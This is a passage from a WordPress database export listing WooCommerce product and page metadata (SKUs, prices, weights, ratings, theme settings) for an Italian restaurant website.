0:{}'),(47897,3111,'_product_version','3.4.3'),(47898,3111,'_price','67'),(47899,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47900,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47901,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47902,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47903,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47904,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47905,3111,'mkdf_show_new_sign_woo_meta','no'),(47906,3111,'slide_template',''),(47907,3111,'_wpb_vc_js_status','false'),(47908,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47909,177,'_sku','PR0021'),(47910,177,'_regular_price','86'),(47911,177,'_sale_price',''),(47912,177,'_sale_price_dates_from',''),(47913,177,'_sale_price_dates_to',''),(47914,177,'total_sales','0'),(47915,177,'_tax_status','taxable'),(47916,177,'_tax_class',''),(47917,177,'_manage_stock','no'),(47918,177,'_backorders','no'),(47919,177,'_sold_individually','no'),(47920,177,'_weight','180'),(47921,177,'_length',''),(47922,177,'_width',''),(47923,177,'_height',''),(47924,177,'_upsell_ids','a:0:{}'),(47925,177,'_crosssell_ids','a:0:{}'),(47926,177,'_purchase_note',''),(47927,177,'_default_attributes','a:0:{}'),(47928,177,'_virtual','no'),(47929,177,'_downloadable','no'),(47930,177,'_product_image_gallery',''),(47931,177,'_download_limit','-1'),(47932,177,'_download_expiry','-1'),(47933,177,'_thumbnail_id','45'),(47934,177,'_stock',''),(47935,177,'_stock_status','instock'),(47936,177,'_wc_average_rating','5.00'),(47937,177,'_wc_rating_count','a:1:{i:5;i:1;}'),(47938,177,'_wc_review_count','1'),(47939,177,'_downloadable_files','a:0:{}'),(47940,177,'_product_attributes','a:0:{}'),(47941,177,'_product_version','3.4.3'),(47942,177,'_price','86'),(47943,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47944,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47945,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47946,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47947,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47948,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47949,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47950,177,'mkdf_show_new_sign_woo_meta','yes'),(47951,177,'slide_template','default'),(47952,177,'_wpb_vc_js_status','false'),(47953,177,'_wp_old_slug','pancakes-with-caviar'),(47954,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47955,180,'_sku','PR0022'),(47956,180,'_regular_price','86'),(47957,180,'_sale_price',''),(47958,180,'_sale_price_dates_from',''),(47959,180,'_sale_price_dates_to',''),(47960,180,'total_sales','0'),(47961,180,'_tax_status','taxable'),(47962,180,'_tax_class',''),(47963,180,'_manage_stock','no'),(47964,180,'_backorders','no'),(47965,180,'_sold_individually','no'),(47966,180,'_weight','230'),(47967,180,'_length',''),(47968,180,'_width',''),(47969,180,'_height',''),(47970,180,'_upsell_ids','a:0:{}'),(47971,180,'_crosssell_ids','a:0:{}'),(47972,180,'_purchase_note',''),(47973,180,'_default_attributes','a:0:{}'),(47974,180,'_virtual','no'),(47975,180,'_downloadable','no'),(47976,180,'_product_image_gallery',''),(47977,180,'_download_limit','-1'),(47978,180,'_download_expiry','-1'),(47980,180,'_stock',''),(47981,180,'_stock_status','instock'),(47982,180,'_wc_average_rating','4.50'),(47983,180,'_wc_rating_count','a:2:{i:4;i:1;i:5;i:1;}'),(47984,180,'_wc_review_count','2'),(47985,180,'_downloadable_files','a:0:{}'),(47986,180,'_product_attributes','a:0:{}'),(47987,180,'_product_version','3.4.3'),(47988,180,'_price','86'),(47989,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47990,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47991,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47992,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47993,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47994,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47995,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47996,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47997,180,'mkdf_show_new_sign_woo_meta','no'),(47998,180,'slide_template','default'),(47999,180,'_wpb_vc_js_status','false'),(48000,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48001,3112,'_sku','PR0023'),(48002,3112,'_regular_price','86'),(48003,3112,'_sale_price',''),(48004,3112,'_sale_price_dates_from',''),(48005,3112,'_sale_price_dates_to',''),(48006,3112,'total_sales','0'),(48007,3112,'_tax_status','taxable'),(48008,3112,'_tax_class',''),(48009,3112,'_manage_stock','no'),(48010,3112,'_backorders','no'),(48011,3112,'_sold_individually','no'),(48012,3112,'_weight','280'),(48013,3112,'_length',''),(48014,3112,'_width',''),(48015,3112,'_height',''),(48016,3112,'_upsell_ids','a:0:{}'),(48017,3112,'_crosssell_ids','a:0:{}'),(48018,3112,'_purchase_note',''),(48019,3112,'_default_attributes','a:0:{}'),(48020,3112,'_virtual','no'),(48021,3112,'_downloadable','no'),(48022,3112,'_product_image_gallery',''),(48023,3112,'_download_limit','-1'),(48024,3112,'_download_expiry','-1'),(48025,3112,'_thumbnail_id','47'),(48026,3112,'_stock',''),(48027,3112,'_stock_status','instock'),(48028,3112,'_wc_average_rating','3.00'),(48029,3112,'_wc_rating_count','a:2:{i:2;i:1;i:4;i:1;}'),(48030,3112,'_wc_review_count','2'),(48031,3112,'_downloadable_files','a:0:{}'),(48032,3112,'_product_attributes','a:0:{}'),(48033,3112,'_product_version','3.4.3'),(48034,3112,'_price','86'),(48035,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48036,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48037,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48038,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48039,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48040,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48041,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48042,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48043,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48044,3112,'mkdf_show_new_sign_woo_meta','no'),(48045,3112,'slide_template','default'),(48046,3112,'_wpb_vc_js_status','false'),(48047,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48048,3113,'_sku','PR0024'),(48049,3113,'_regular_price','86'),(48050,3113,'_sale_price',''),(48051,3113,'_sale_price_dates_from',''),(48052,3113,'_sale_price_dates_to',''),(48053,3113,'total_sales','0'),(48054,3113,'_tax_status','taxable'),(48055,3113,'_tax_class',''),(48056,3113,'_manage_stock','no'),(48057,3113,'_backorders','no'),(48058,3113,'_sold_individually','no'),(48059,3113,'_weight','230'),(48060,3113,'_length',''),(48061,3113,'_width',''),(48062,3113,'_height',''),(48063,3113,'_upsell_ids','a:0:{}'),(48064,3113,'_crosssell_ids','a:0:{}'),(48065,3113,'_purchase_note',''),(48066,3113,'_default_attributes','a:0:{}'),(48067,3113,'_virtual','no'),(48068,3113,'_downloadable','no'),(48069,3113,'_product_image_gallery',''),(48070,3113,'_download_limit','-1'),(48071,3113,'_download_expiry','-1'),(48072,3113,'_thumbnail_id','48'),(48073,3113,'_stock',''),(48074,3113,'_stock_status','instock'),(48075,3113,'_wc_average_rating','5.00'),(48076,3113,'_wc_rating_count','a:1:{i:5;i:1;}'),(48077,3113,'_wc_review_count','1'),(48078,3113,'_downloadable_files','a:0:{}'),(48079,3113,'_product_attributes','a:0:{}'),(48080,3113,'_product_version','3.4.3'),(48081,3113,'_price','86'),(48082,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48083,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48084,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48085,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48086,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48087,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48088,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48089,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48090,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48091,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48092,3113,'mkdf_show_new_sign_woo_meta','no'),(48093,3113,'slide_template','default'),(48094,3113,'_wpb_vc_js_status','false'),(48095,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48096,3114,'_sku','PR0025'),(48097,3114,'_regular_price','86'),(48098,3114,'_sale_price',''),(48099,3114,'_sale_price_dates_from',''),(48100,3114,'_sale_price_dates_to',''),(48101,3114,'total_sales','0'),(48102,3114,'_tax_status','taxable'),(48103,3114,'_tax_class',''),(48104,3114,'_manage_stock','no'),(48105,3114,'_backorders','no'),(48106,3114,'_sold_individually','no'),(48107,3114,'_weight','310'),(48108,3114,'_length',''),(48109,3114,'_width',''),(48110,3114,'_height',''),(48111,3114,'_upsell_ids','a:0:{}'),(48112,3114,'_crosssell_ids','a:0:{}'),(48113,3114,'_purchase_note',''),(48114,3114,'_default_attributes','a:0:{}'),(48115,3114,'_virtual','no'),(48116,3114,'_downloadable','no'),(48117,3114,'_product_image_gallery',''),(48118,3114,'_download_limit','-1'),(48119,3114,'_download_expiry','-1'),(48120,3114,'_thumbnail_id','49'),(48121,3114,'_stock',''),(48122,3114,'_stock_status','instock'),(48123,3114,'_wc_average_rating','1.00'),(48124,3114,'_wc_rating_count','a:1:{i:1;i:1;}'),(48125,3114,'_wc_review_count','1'),(48126,3114,'_downloadable_files','a:0:{}'),(48127,3114,'_product_attributes','a:0:{}'),(48128,3114,'_product_version','3.4.3'),(48129,3114,'_price','86'),(48130,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48131,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48132,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48133,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48134,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48135,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48136,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48137,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48138,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48139,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48140,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48141,3114,'mkdf_show_new_sign_woo_meta','no'),(48142,3114,'slide_template','default'),(48143,3114,'_wpb_vc_js_status','false'),(48144,1670,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48145,1670,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48146,1670,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48147,1670,'slide_template','default'),(48148,1670,'mkdf_page_content_behind_header_meta','no'),(48149,1670,'mkdf_video_type_meta','social_networks'),(48150,1670,'mkdf_audio_type_meta','social_networks'),(48151,1670,'mkdf_disable_vertical_header_background_image_meta','no'),(48152,1670,'mkdf_disable_header_widget_areas_meta','no'),(48153,1670,'mkdf_show_title_area_meta','yes'),(48154,1670,'mkdf_title_area_type_meta','attika'),(48155,1670,'_mkdf-like','0'),(52196,4364,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48157,1670,'_wpb_vc_js_status','true'),(48158,1670,'mkdf_page_content_padding','120px 0 0'),(48159,1670,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48160,1670,'_dp_original','6'),(48161,1670,'mkdf_post_video_link_meta','https://vimeo.com/172791927'),(48162,1670,'_wp_old_slug','big-chefs-recomendations'),(48163,1670,'_wp_old_slug','big-chefs-recomended'),(48164,1671,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48165,1671,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48166,1671,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48167,1671,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48168,1671,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48169,1671,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48170,1671,'slide_template','default'),(48171,1671,'mkdf_page_content_behind_header_meta','no'),(48172,1671,'mkdf_video_type_meta','social_networks'),(48173,1671,'mkdf_audio_type_meta','social_networks'),(48174,1671,'mkdf_disable_vertical_header_background_image_meta','no'),(48175,1671,'mkdf_disable_header_widget_areas_meta','no'),(48176,1671,'mkdf_show_title_area_meta','yes'),(48177,1671,'mkdf_title_area_type_meta','attika'),(48178,1671,'_mkdf-like','0'),(52195,4364,'_menu_item_url','#'),(48180,1671,'_wpb_vc_js_status','true'),(48181,1671,'mkdf_page_content_padding','120px 0 0'),(48182,1671,'_dp_original','1670'),(48183,1671,'mkdf_post_quote_text_meta','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque.'),(48184,1677,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48185,1677,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48186,1677,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48187,1677,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48188,1677,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48189,1677,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48190,1677,'slide_template','default'),(48191,1677,'mkdf_page_content_behind_header_meta','no'),(48192,1677,'mkdf_video_type_meta','social_networks'),(48193,1677,'mkdf_audio_type_meta','social_networks'),(48194,1677,'mkdf_disable_vertical_header_background_image_meta','no'),(48195,1677,'mkdf_disable_header_widget_areas_meta','no'),(48196,1677,'mkdf_show_title_area_meta','yes'),(48197,1677,'mkdf_title_area_type_meta','attika'),(48198,1677,'_mkdf-like','0'),(52194,4364,'_menu_item_xfn',''),(48200,1677,'_wpb_vc_js_status','true'),(48201,1677,'mkdf_page_content_padding','120px 0 0'),(48202,1677,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(48203,1677,'_dp_original','1670'),(48204,1677,'mkdf_post_link_link_meta','https://themeforest.net/user/mikado-themes'),(48205,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48206,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48207,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48208,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48209,1681,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48210,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48211,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48212,1681,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48213,1681,'slide_template','default'),(48214,1681,'mkdf_page_content_behind_header_meta','no'),(48215,1681,'mkdf_video_type_meta','social_networks'),(48216,1681,'mkdf_audio_type_meta','self'),(48217,1681,'mkdf_disable_vertical_header_background_image_meta','no'),(48218,1681,'mkdf_disable_header_widget_areas_meta','no'),(48219,1681,'mkdf_show_title_area_meta','yes'),(48220,1681,'mkdf_title_area_type_meta','attika'),(48221,1681,'_mkdf-like','0'),(52199,4365,'_menu_item_object_id','4365'),(48223,1681,'_wpb_vc_js_status','true'),(48224,1681,'mkdf_page_content_padding','120px 0 0'),(48225,1681,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(48226,1681,'_dp_original','1677'),(48227,1681,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(48228,1681,'_wp_old_slug','fine-dinning-restaurant'),(48229,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48230,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48231,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48232,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48233,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48234,1685,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48235,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48236,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48237,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48238,1685,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48239,1685,'slide_template','default'),(48240,1685,'mkdf_page_content_behind_header_meta','no'),(48241,1685,'mkdf_video_type_meta','social_networks'),(48242,1685,'mkdf_audio_type_meta','self'),(48243,1685,'mkdf_disable_vertical_header_background_image_meta','no'),(48244,1685,'mkdf_disable_header_widget_areas_meta','no'),(48245,1685,'mkdf_show_title_area_meta','yes'),(48246,1685,'mkdf_title_area_type_meta','attika'),(48247,1685,'_mkdf-like','0'),(52153,4360,'_menu_item_menu_item_parent','0'),(48249,1685,'_wpb_vc_js_status','true'),(48250,1685,'mkdf_page_content_padding','120px 0 0'),(48251,1685,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(48252,1685,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(48253,1685,'_dp_original','1681'),(48254,1685,'mkdf_post_gallery_images_meta','1702,1703'),(48255,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48256,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48257,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48258,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48259,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48260,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48261,1688,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48262,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48263,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48264,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48265,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48266,1688,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48267,1688,'slide_template','default'),(48268,1688,'mkdf_page_content_behind_header_meta','no'),(48269,1688,'mkdf_video_type_meta','social_networks'),(48270,1688,'mkdf_audio_type_meta','self'),(48271,1688,'mkdf_disable_vertical_header_background_image_meta','no'),(48272,1688,'mkdf_disable_header_widget_areas_meta','no'),(48273,1688,'mkdf_show_title_area_meta','yes'),(48274,1688,'mkdf_title_area_type_meta','attika'),(48275,1688,'_mkdf-like','0'),(52166,4361,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(48277,1688,'_wpb_vc_js_status','true'),(48278,1688,'mkdf_page_content_padding','120px 0 0'),(48279,1688,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(48280,1688,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(48281,1688,'_dp_original','1685'),(48282,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48283,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48284,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48285,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48286,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48287,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48288,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48289,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48290,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48291,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48292,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48293,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48294,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48295,1693,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(48296,1693,'slide_template','default'),(48297,1693,'mkdf_page_content_behind_header_meta','no'),(48298,1693,'mkdf_video_type_meta','social_networks'),(48299,1693,'mkdf_audio_type_meta','self'),(48300,1693,'mkdf_disable_vertical_header_background_image_meta','no'),(48301,1693,'mkdf_disable_header_widget_areas_meta','no'),(48302,1693,'mkdf_show_title_area_meta','yes'),(48303,1693,'mkdf_title_area_type_meta','attika'),(48304,1693,'_mkdf-like','0'),(52201,4365,'_menu_item_target',''),(48306,1693,'_wpb_vc_js_status','true'),(48307,1693,'mkdf_page_content_padding','120px 0 0'),(48308,1693,'mkdf_post_video_link_meta','https://vimeo.com/15306847'),(48309,1693,'mkdf_post_audio_custom_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/b-audio-everytings-nice.mp3'),(48310,1693,'_dp_original','1688'),(48311,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48312,3115,'_sku','PR0026'),(48313,3115,'_regular_price','86'),(48314,3115,'_sale_price',''),(48315,3115,'_sale_price_dates_from',''),(48316,3115,'_sale_price_dates_to',''),(48317,3115,'total_sales','0'),(48318,3115,'_tax_status','taxable'),(48319,3115,'_tax_class',''),(48320,3115,'_manage_stock','no'),(48321,3115,'_backorders','no'),(48322,3115,'_sold_individually','no'),(48323,3115,'_weight','310'),(48324,3115,'_length',''),(48325,3115,'_width',''),(48326,3115,'_height',''),(48327,3115,'_upsell_ids','a:0:{}'),(48328,3115,'_crosssell_ids','a:0:{}'),(48329,3115,'_purchase_note',''),(48330,3115,'_default_attributes','a:0:{}'),(48331,3115,'_virtual','no'),(48332,3115,'_downloadable','no'),(48333,3115,'_product_image_gallery',''),(48334,3115,'_download_limit','-1'),(48335,3115,'_download_expiry','-1'),(48336,3115,'_stock',''),(48337,3115,'_stock_status','instock'),(48338,3115,'_wc_average_rating','3.00'),(48339,3115,'_wc_rating_count','a:1:{i:3;i:1;}'),(48340,3115,'_wc_review_count','1'),(48341,3115,'_downloadable_files','a:0:{}'),(48342,3115,'_product_attributes','a:0:{}'),(48343,3115,'_product_version','3.4.3'),(48344,3115,'_price','86'),(48345,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48346,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48347,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48348,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48349,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48350,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48351,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48352,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48353,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48354,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48355,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48356,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48357,3115,'mkdf_show_new_sign_woo_meta','no'),(48358,3115,'slide_template','default'),(48359,3115,'_wpb_vc_js_status','false'),(48360,3115,'_thumbnail_id','467'),(48361,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48362,3116,'_sku','PR0027'),(48363,3116,'_regular_price','25'),(48364,3116,'_sale_price',''),(48365,3116,'_sale_price_dates_from',''),(48366,3116,'_sale_price_dates_to',''),(48367,3116,'total_sales','0'),(48368,3116,'_tax_status','taxable'),(48369,3116,'_tax_class',''),(48370,3116,'_manage_stock','no'),(48371,3116,'_backorders','no'),(48372,3116,'_sold_individually','no'),(48373,3116,'_weight','250'),(48374,3116,'_length',''),(48375,3116,'_width',''),(48376,3116,'_height',''),(48377,3116,'_upsell_ids','a:0:{}'),(48378,3116,'_crosssell_ids','a:0:{}'),(48379,3116,'_purchase_note',''),(48380,3116,'_default_attributes','a:0:{}'),(48381,3116,'_virtual','no'),(48382,3116,'_downloadable','no'),(48383,3116,'_product_image_gallery',''),(48384,3116,'_download_limit','-1'),(48385,3116,'_download_expiry','-1'),(48386,3116,'_stock',''),(48387,3116,'_stock_status','instock'),(48388,3116,'_wc_average_rating','4.00'),(48389,3116,'_wc_rating_count','a:1:{i:4;i:1;}'),(48390,3116,'_wc_review_count','1'),(48391,3116,'_downloadable_files','a:0:{}'),(48392,3116,'_product_attributes','a:0:{}'),(48393,3116,'_product_version','3.4.3'),(48394,3116,'_price','25'),(48395,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48396,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48397,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48398,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48399,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48400,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48401,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48402,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48403,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48404,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48405,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48406,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48407,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48408,3116,'mkdf_show_new_sign_woo_meta','no'),(48409,3116,'slide_template','default'),(48410,3116,'_wpb_vc_js_status','false'),(48412,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(48413,3117,'_sku','PR0028'),(48414,3117,'_regular_price','89'),(48415,3117,'_sale_price',''),(48416,3117,'_sale_price_dates_from',''),(48417,3117,'_sale_price_dates_to',''),(48418,3117,'total_sales','0'),(48419,3117,'_tax_status','taxable'),(48420,3117,'_tax_class',''),(48421,3117,'_manage_stock','no'),(48422,3117,'_backorders','no'),(48423,3117,'_